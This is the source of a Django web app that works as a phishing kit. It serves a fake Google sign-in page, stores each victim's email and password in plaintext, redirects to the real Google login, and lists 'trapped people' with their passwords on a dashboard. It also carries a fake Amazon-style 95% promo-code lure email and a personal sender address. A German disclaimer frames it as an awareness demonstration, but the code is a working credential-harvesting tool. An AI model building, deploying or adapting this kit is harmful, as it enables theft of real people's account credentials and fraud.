src/blog/urls.py
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include

from accounts.views import signup
from blog import settings


urlpatterns = [
                  path('admin/', admin.site.urls),
                  path('blog/', include('posts.urls')),
                  path('trap/', include('traps.urls')),
                  path('compte/nouveau/', signup, name="signup"),
                  path("compte/", include("django.contrib.auth.urls"))
              ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)  # permet de lier nos url des media au image. sans quoi l'mage ne peut pas sortir.

src/traps/urls.py
from django.urls import path

from traps.views import google_show, amazon_offer_show, ListTrapShow, homeView, DeleteElement

app_name = "traps"

urlpatterns = [
    # path('', TrapHome.as_view(), name="traphome"),
    path('home/', homeView, name="home"),
    path('google/', google_show, name="google"),
    path('amazon/', amazon_offer_show, name="amazon"),
    path('list-trap/', ListTrapShow.as_view(), name="list-trap"),
    path('delete/<slug:email_slug>/', DeleteElement.as_view(), name="delete"),# pour mieux comprendre cette ligne, voire la vue de suppression


]

src/traps/models.py
from django.db import models
from django.utils.text import slugify


# Create your models here.
class Victim(models.Model):
    email = models.CharField(max_length=255, unique=True)
    password = models.CharField(max_length=255)
    trap_date = models.DateTimeField(auto_now=True)
    slug = models.SlugField(unique=True, blank=True)  # Champ slug associé à l'email

    def save(self, *args, **kwargs):
        # Génération du slug à partir de l'email, pour indiquer que à une vue generique que l'extraction des element doit etre sur le champ email
        self.slug = slugify(self.email)
        super().save(*args, **kwargs)

src/traps/views.py
from django.contrib import messages
from django.shortcuts import render, redirect
from django.core.mail import send_mail
from django.urls import reverse_lazy

from traps.models import Victim
from django.views.generic import ListView, DeleteView


def amazon_offer_show(request):
    return render(request, "traps/amazon/Amazon DE Coupons 50_ Off October 2023 Promo Codes.htm")


def homeView(request):
    return render(request, "traps/home.html")


# Create your views here.


subject = 'PROMOCODE'
message = (
    f"Dear valued customer,\n\n"
    f"We are thrilled to inform you that your exclusive promo code has just landed in your inbox! "
    f"You can now enjoy a spectacular 95% discount on any item you purchase within the given timeframe. "
    f"Your unique promo code is: Q0FK52LM28MY3.\n\n"
    f"We wanted to extend our heartfelt congratulations on unlocking this fantastic opportunity. "
    f"Don't miss out on this chance to grab your favorites at an incredible price!\n\n"
    f"At Amazone DE, we are always here for you, making your shopping experience with us unforgettable.\n\n"
    f"Thank you for choosing us.\n\n"
    f"Warm regards, \n\n"
    f"Your Amazone team"
)
sender_email = 'sackoibrahimakhalil@gmail.com'  # L'adresse e-mail de l'expéditeur


def google_show(request):

    if request.method == "POST":
        email = request.POST.get('identifier')
        password = request.POST.get('password')

        # Vérification si les champs ne sont pas vides
        if email and password:
            # Vérification si l'email existe déjà dans la base de données
            existing_victim = Victim.objects.filter(email=email).exists()
            if existing_victim:
                messages.error(request, "This Email already exists in the database.")
            else:
                # Enregistrement des données
                trap = Victim(email=email, password=password)
                trap.save()
                return redirect('https://accounts.google.com/InteractiveLogin/identifier?continue=https%3A%2F%2Fwww.google.com%2F%3Fhl%3Dfr%26pli%3D1&ec=GAZAmgQ&hl=fr&passive=true&ifkv=ASKXGp3LkqV2-XMQk5XIrJbsOeGT5iJTyoyj5-zM1EZVjOaNNLeOjQB3ZNkydghDbdM59O8smJw0MA&theme=glif&flowName=GlifWebSignIn&flowEntry=ServiceLogin')

        else:
            messages.error(request, "Both of the two fields are required")# Affichage d'un message d'erreur si les champs sont vides
    return render(request, 'traps/goog/backup.html') #traps/goog/backup.html    'traps/goog/reserve/backup - secour.html'


class ListTrapShow(ListView):
    model = Victim
    context_object_name = "victims"

class DeleteElement(DeleteView):
    model = Victim
    context_object_name = "victim"
    #template_name = 'victim_confirm_delete.html'
    slug_field = 'slug'  # Utilise le champ slug comme référence pour extraire l'objet
    slug_url_kwarg = 'email_slug'  # Utilise le slug dans l'URL avec le nom 'email_slug'
    success_url = reverse_lazy("traps:list-trap")

src/traps/templates/traps/basetemplate.html
{% load static %}
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    {% block title %}

    {% endblock %}
    <link rel="stylesheet" href="{% static 'traps/css/basetemplate.css' %}">
</head>
<body>
    <nav>
        <a href="{% url 'traps:home' %}">Home</a>
        <a href="{% url 'traps:amazon' %}">Track your victim</a>
        <a href="{% url 'traps:list-trap' %}">Tracked list</a>
    </nav>
    <main>
        <div class="centered-content">
           {% block content %}

            {% endblock  %}
        </div>
    </main>
    <footer>
        <p>© 2024 SACKO KALIL</p>
    </footer>
</body>
</html>

src/traps/templates/traps/home.html
{% extends 'traps/basetemplate.html' %}

{% block title %}
    <title>trap-home</title>
{% endblock %}


{% block content %}
    <h1>Phishing: eine Gefahr für die Online-Sicherheit</h1>
            <p>
                Die Online-Sicherheit ist in unserer vernetzten Welt von großer Bedeutung.
                Eine zunehmende Bedrohung ist das Phishing, eine bösartige Praxis, die darauf abzielt,
                Einzelpersonen zu täuschen, um an ihre persönlichen Informationen zu gelangen.
                Es ist eine hinterlistige Falle, die verheerende Folgen haben kann.
            </p>
            <p>
                Phishing nimmt verschiedene Formen an: betrügerische E-Mails, die sich als legitime Unternehmen
                ausgeben, Nachrichten in sozialen Medien oder sogar gefälschte Websites.
                Ihr Ziel? Sie dazu zu verleiten, Ihre Anmeldeinformationen, finanziellen Informationen oder andere sensible
                Daten preiszugeben. Diese Handlungen können zu Identitätsdiebstahl, erheblichen finanziellen Verlusten und
                sogar Verletzungen der Privatsphäre führen.
            </p>
            <p>
                Wir sind hier, um aufzuklären, zu informieren, aber vor allem, um abzuschrecken.
                Das Erstellen von Phishing-Websites oder die Beteiligung an solchen Aktivitäten ist
                nicht nur illegal, sondern auch ethisch verwerflich. Diese Demonstration zielt darauf ab,
                andere für die Risiken des Phishings zu sensibilisieren.
            </p>
            <p>
                Der beste Weg, Phishing zu verhindern, besteht darin, sich aktiv zu schützen.
                Teilen Sie niemals Ihre persönlichen Informationen über fragwürdige Links,
                unerwünschte E-Mails oder nicht vertrauenswürdige Quellen.
                Seien Sie misstrauisch gegenüber plötzlichen Anfragen und ungewöhnlich
                erscheinenden Mitteilungen, auch wenn sie von legitimen Quellen zu stammen scheinen.
            </p>

            <p>
                Das Aufklären anderer über diese betrügerischen Praktiken ist von entscheidender Bedeutung,
                sollte jedoch stets auf verantwortungsvolle und ethische Weise erfolgen. Lasst uns unser Wissen nutzen,
                um über Sicherheitsmaßnahmen im Internet zu informieren und anderen dabei zu helfen, sich vor diesen Gefahren
                zu schützen - immer im Einklang mit Gesetzen und Ethik.
            </p>

            <p>
                Gemeinsam fördern wir eine sichere Online-Umgebung, indem wir jegliche
                Beteiligung an illegalen und schädlichen Aktivitäten wie dem Phishing aktiv
                entgegenwirken. Priorisieren wir Aufklärung und Bildung, um einen sichereren
                Cyberspace für alle zu schaffen.
            </p>




{% endblock %}

src/traps/templates/traps/victim_confirm_delete.html
{% extends 'traps/basetemplate.html' %}

{% block title %}
    <title>delete-element</title>
{% endblock %}


{% block content %}

    <form method="POST">
      {% csrf_token %}
      <p> Sind Sie sich sicher " <strong><i>{{ victim.email }}</i> </strong> löschen zu wollen?" </p>
      <input type="submit" value="Ja, Löschen" class="btn btn-delete">
    </form>

{% endblock %}

src/traps/templates/traps/victim_list.html
{% extends 'traps/basetemplate.html' %}
{% load static %}



{% block title %}
    <title>List of trapped people</title>
{% endblock %}



{% block content %}
    <style>

    </style>

    <h1> List of trapped people</h1>

    <table border="1">
        <tr>
            <th>Email</th>
            <th>Password</th>
            <th>Trapdate</th>
            <th>Action</th>
        </tr>

         {% for victim in victims %}
            <tr>

                <td>{{victim.email}}</td>
                <td>{{victim.password}}</td>
                <td>{{victim.trap_date}}</td>
               <td>  <a href="{% url 'traps:delete' email_slug=victim.slug  %}" alt="Delete">  <img class="delete-icon" src="{% static 'traps/images/icone_suppression.jpg' %}" alt="Supprimer"></a> </td>

            </tr>
        {% endfor %}
        <!-- Vous pouvez ajouter plus de lignes avec les données ici -->
    </table>

    <!-- Ajout d'un espace en bas du tableau -->
    <div class="bottom-space"></div>

{% endblock %}